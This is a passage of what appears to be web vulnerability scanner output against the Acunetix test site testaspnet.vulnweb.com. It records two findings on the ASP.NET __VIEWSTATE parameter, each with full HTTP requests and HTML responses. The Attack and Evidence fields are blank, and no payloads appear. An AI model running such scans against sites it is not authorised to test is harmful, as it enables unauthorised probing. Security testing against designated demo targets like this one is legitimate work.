style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8555&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgCA16OOZNsIZGRkprk0QDKZDe5cp5jSmLrmtd%2Ft9Wk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLM79apBgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMoh9GMLhoZQxocQK0jVa7W5zbcqs%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:13:51 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgCA16OOZNsIZGRkprk0QDKZDe5cp5jSmLrmtd/t9Wk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLM79apBgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMoh9GMLhoZQxocQK0jVa7W5zbcqs=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:White" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8559&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgCAfk2zZ9sIZGRkJHSM33drFohN1OXlY0ejMULTbP8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKot9rABAK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMM5g4yblcBCXUEEwaWhVN%2BG5iMrU%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:25:31 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgCAfk2zZ9sIZGRkJHSM33drFohN1OXlY0ejMULTbP8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKot9rABAK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMM5g4yblcBCXUEEwaWhVN+G5iMrU=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:White" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get 